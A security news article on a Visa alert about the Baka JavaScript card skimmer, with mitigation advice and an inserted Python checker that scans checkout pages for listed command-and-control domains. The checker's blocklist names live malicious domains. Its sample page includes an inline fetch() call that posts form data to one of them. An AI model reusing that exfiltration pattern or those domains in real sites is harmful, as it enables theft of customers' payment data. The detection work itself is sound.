Visa Warns of Fresh Skimmer Targeting E-Commerce Sites
'Baka' Avoids Detection While Stealing Customers' Payment Card Data
Visa's payment fraud disruption team is warning of a recently uncovered digital skimmer called "Baka" that is stealing payment card data from e-commerce sites while hiding from security tools.
Researchers discovered the malicious code while examining a command-and-control infrastructure that previously hosted the ImageID skimmer.
Although Baka functions similarly to other JavaScript skimmers, the Visa fraud team found that this malicious code is able to load dynamically into e-commerce sites and then hide from security tools using obfuscation techniques, according to the Visa alert.
The Baka skimmer has been found in "several merchant websites across multiple global regions," the alert notes, but it does not provide further details.
"The most compelling components of this kit are the unique loader and obfuscation method," the Visa alert notes. "The skimmer loads dynamically to avoid static malware scanners and uses unique encryption parameters for each victim to obfuscate the malicious code. … This skimmer variant avoids detection and analysis by removing itself from memory when it detects the possibility of dynamic analysis with developer tools or when data has been successfully exfiltrated."
How Baka Works
The Visa alert does not indicate how Baka is initially delivered to a network. But the report notes that the malicious code is hosted on several suspicious domains, including: jquery-cycle[.]com, b-metric[.]com, apienclave[.]com, quicdn[.]com, apisquere[.]com, ordercheck[.]online and pridecdn[.]com.
Once the initial infection takes hold, the skimmer is delivered from the command-and-control server, but the code loads only in memory. This means the malware is never written to the targeted e-commerce firm's server or saved to any other device, helping it avoid detection, according to the alert.
"The skimming payload decrypts to JavaScript written to resemble code that would be used to render pages dynamically," according to Visa.
Once embedded in an e-commerce site’s checkout page, the skimmer begins to collect payment and other customer data from various fields and sends the information to the fraudsters’ command-and-control server, Visa notes.
Once data exfiltration is complete, Baka performs a "clean-up" function that removes the skimming code from the checkout page, according to the alert. This also helps ensure that the JavaScript is not spotted by anti-malware tools.
Visa's analysts found that the operators behind Baka use an XOR cipher as a way to obscure the malicious code and further hide it from detection, according to the alert.
"While the use of an XOR cipher is not new, this is the first time Visa has observed its use in JavaScript skimming malware," according to the alert.
Mitigating Risks
The Visa alert advises e-commerce merchants to take several steps to mitigate skimming risks, including:
- Run regular checks to determine if any code is attempting to communicate with a known command-and-control server;
- Check code added through a service provider;
- Vet content delivery networks and other third parties that have access to the checkout function;
- Update and patch any software or services used on checkout sites and consider adding a firewall;
- Limit access to online administrative portals and ensure that those with access use strong passwords.
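One way to implement the first of those checks, as an added example that is not part of the Visa alert or this article: it scans a checkout page's external script tags and inline script bodies for URLs pointing at the domains the alert names (refanged here so hostnames compare). The checkout HTML below is constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Domains the Visa alert names as hosting the loader, refanged; treat as an example blocklist.
KNOWN_C2_DOMAINS = {
    "jquery-cycle.com", "b-metric.com", "apienclave.com", "quicdn.com",
    "apisquere.com", "ordercheck.online", "pridecdn.com",
}

# <script ...>body</script>: capture the attribute string and the inline body.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.I)

def matches_known_c2(host, blocklist=KNOWN_C2_DOMAINS):
    """True if host is a listed domain or any subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocklist)

def _hostname(url):
    # Scheme-relative "//host/path" parses directly; a bare "host/path" needs the prefix.
    return urlparse(url if "//" in url else "//" + url).hostname

def find_c2_references(html, blocklist=KNOWN_C2_DOMAINS):
    """Sorted (location, url) pairs for every script URL on a listed domain."""
    hits = set()
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = _hostname(src.group(1))
            if host and matches_known_c2(host, blocklist):
                hits.add(("script-src", src.group(1)))
        for url in URL_RE.findall(body):          # URL literals inside inline scripts
            host = _hostname(url)
            if host and matches_known_c2(host, blocklist):
                hits.add(("inline-script", url))
    return sorted(hits)

# Constructed checkout page: one legitimate script, one loader from a listed domain,
# and an inline exfiltration endpoint on a subdomain of another listed domain.
SAMPLE_CHECKOUT_HTML = """<html><body>
<script src="https://cdn.example-shop.test/checkout.js"></script>
<script src="//quicdn.com/jquery.cycle.min.js"></script>
<script>
  var endpoint = "https://api.ordercheck.online/collect";
  fetch(endpoint, {method: "POST", body: formData});
</script>
</body></html>"""

if __name__ == "__main__":
    for where, url in find_c2_references(SAMPLE_CHECKOUT_HTML):
        print(f"{where}: {url}")
```

Run it against a periodically fetched copy of the live checkout page; any hit means a script or endpoint on a listed domain is reachable from the page and warrants an incident-response check of the deployed code.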
Other Skimming Attacks
In November 2019, Visa researchers uncovered another type of skimmer called Pipka that had the ability to remove itself from the HTML of a compromised payment website after it executed, enabling it to avoid security detection (see: New JavaScript Skimmer Found on E-Commerce Sites).
Other security researchers have more recently warned about ongoing attacks against e-commerce websites using malicious JavaScript to steal payment card data.
For example, in August, security firm Group-IB warned of a cybercriminal gang called "UltraRank" that is using malicious code to skim payment card data and then selling that information to others on its own underground site (see: 'UltraRank' Gang Sells Card Data It Steals).
Earlier this month, security firm Malwarebytes warned that some fraudsters have started using encrypted messages on Telegram to steal data faster (see: Fraudsters Use Telegram App to Steal Payment Card Data).